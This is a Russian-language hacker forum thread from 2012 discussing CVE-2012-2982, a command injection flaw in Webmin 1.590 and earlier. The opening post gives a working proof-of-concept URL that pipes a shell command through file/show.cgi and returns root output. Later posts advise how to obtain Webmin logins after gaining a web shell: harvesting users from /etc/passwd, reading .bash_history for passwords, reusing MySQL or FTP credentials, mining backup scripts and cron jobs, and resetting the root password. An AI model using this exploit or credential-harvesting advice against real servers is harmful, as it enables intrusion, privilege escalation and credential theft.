Старый 23.09.2012, 12:25   #1
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию CVE-2012-2982 Webmin <=1.590

Цитата:
file/show.cgi in Webmin 1.590 and earlier allows remote authenticated users to execute arbitrary commands via an invalid character in a pathname, as demonstrated by a | (pipe) character.
http://cve.mitre.org/cgi-bin/cvename...=CVE-2012-2982

(under review) - lol

POC - RCE with root rights (with any account, root or non-root, you must be log in) :

Код:
https://site:10000/file/show.cgi/bin/48566|id|

uid=0(root) gid=0(root) groups=0(root)

Последний раз редактировалось Pashkela; 23.09.2012 в 12:31..
Pashkela вне форума   Ответить с цитированием
Старый 23.09.2012, 18:12   #2
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Ахаха, старый добрый пайп
Ereeee вне форума   Ответить с цитированием
Старый 23.09.2012, 18:26   #3
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

переделано из этого шита:

http://cxsecurity.com/issue/WLB-2012090163

иногда непонятно, зачем так всё сложно делать

Цитата:
Ахаха, старый добрый пайп
да-да, сувать непроверенные данные от пользователя в open чревато

PS: Кстати всем на заметку, изучайте новые модули метасплойта, который раз замечаю, что там быстрее всех выкладывают реализацию свежих уязвимостей

проверено на 1.580

ls -la /usr/share/webmin/ + любой юзер из /etc/passwd (если он принудительно не запрещен)

Последний раз редактировалось Pashkela; 24.09.2012 в 08:29..
Pashkela вне форума   Ответить с цитированием
Старый 24.09.2012, 10:30   #4
oRb
 
Аватар для oRb
 
Регистрация: 01.07.2010
Сообщений: 319
Репутация: 138
По умолчанию

Бага больше прикольная, чем опасная., так как для эксплуатации требует аутентификации.
Пользователям итак можно выполнять команды через интерфейс Webmin'а.

ps: проверил на стареньком 1.520 - работает.
__________________
Не оказываю никаких услуг.
I don't provide any services.
oRb вне форума   Ответить с цитированием
Старый 24.09.2012, 10:39   #5
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
Пользователям итак можно выполнять команды через интерфейс Webmin'а.
да, но не от рута же) Например зарегился как sudo user, и без судо стал рутом

Некоторые товарищи настраивают гостевой доступ вообще без аутентификации

Последний раз редактировалось Pashkela; 24.09.2012 в 12:03..
Pashkela вне форума   Ответить с цитированием
Старый 24.09.2012, 11:13   #6
lochankin
 
Регистрация: 31.08.2012
Сообщений: 14
Репутация: 1
По умолчанию

1.590 на виртуалке отработала отлично
теперь непонятно - есть вебшел, как получить хоть сраного узера чтоб в вебмин зайти?
или я открытую дверь не вижу )
lochankin вне форума   Ответить с цитированием
Старый 24.09.2012, 11:24   #7
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

попробутить /etc/passwd (имя пользователя можно брать оттуда)

почитать .bash_history в домашних каталогах на предмет паролей

попробовать пароли от учеток mysql на логин в webmin (а также ftp и прочие)

проверить скрипты бекапов сайтов, баз - очень часто там палят имя пользователя и пароль. Тут в первую очередь будут интересны для изучения задачи по крону

Любой юзер подберется - и вы рут

PS:

Файлы конфигурации:

/etc/webmin/miniserv.conf - тут порт, на котором висит webmin, и прочие вещи)
/etc/webmin/miniserv.users - тут типо юзеры

изменить пароль юзера:

/usr/share/webmin/changepass.pl /etc/webmin root pass

но тут с правами рута только

Последний раз редактировалось Pashkela; 24.09.2012 в 12:02..
Pashkela вне форума   Ответить с цитированием
Старый 24.09.2012, 11:51   #8
lochankin
 
Регистрация: 31.08.2012
Сообщений: 14
Репутация: 1
По умолчанию

ну значит нет открытой двери (((
все равно ручной поиск или соц. инженерия
lochankin вне форума   Ответить с цитированием
Старый 24.09.2012, 17:56   #9
oRb
 
Аватар для oRb
 
Регистрация: 01.07.2010
Сообщений: 319
Репутация: 138
По умолчанию

Я не гуру webmin'а, могу ошибаться.

Цитата:
Сообщение от Pashkela Посмотреть сообщение
да, но не от рута же) Например зарегился как sudo user, и без судо стал рутом
У меня в Others > Command Shell:
Цитата:
> id
uid=0(root) gid=0(root) groups=0(root)
Логинился с учетки, имеющей права на sudo.

Цитата:
Сообщение от Pashkela Посмотреть сообщение
Некоторые товарищи настраивают гостевой доступ вообще без аутентификации
разве такое возможно? Мне казалось, что доступ в webmin имеет только root и sudo пользователи.
__________________
Не оказываю никаких услуг.
I don't provide any services.
oRb вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot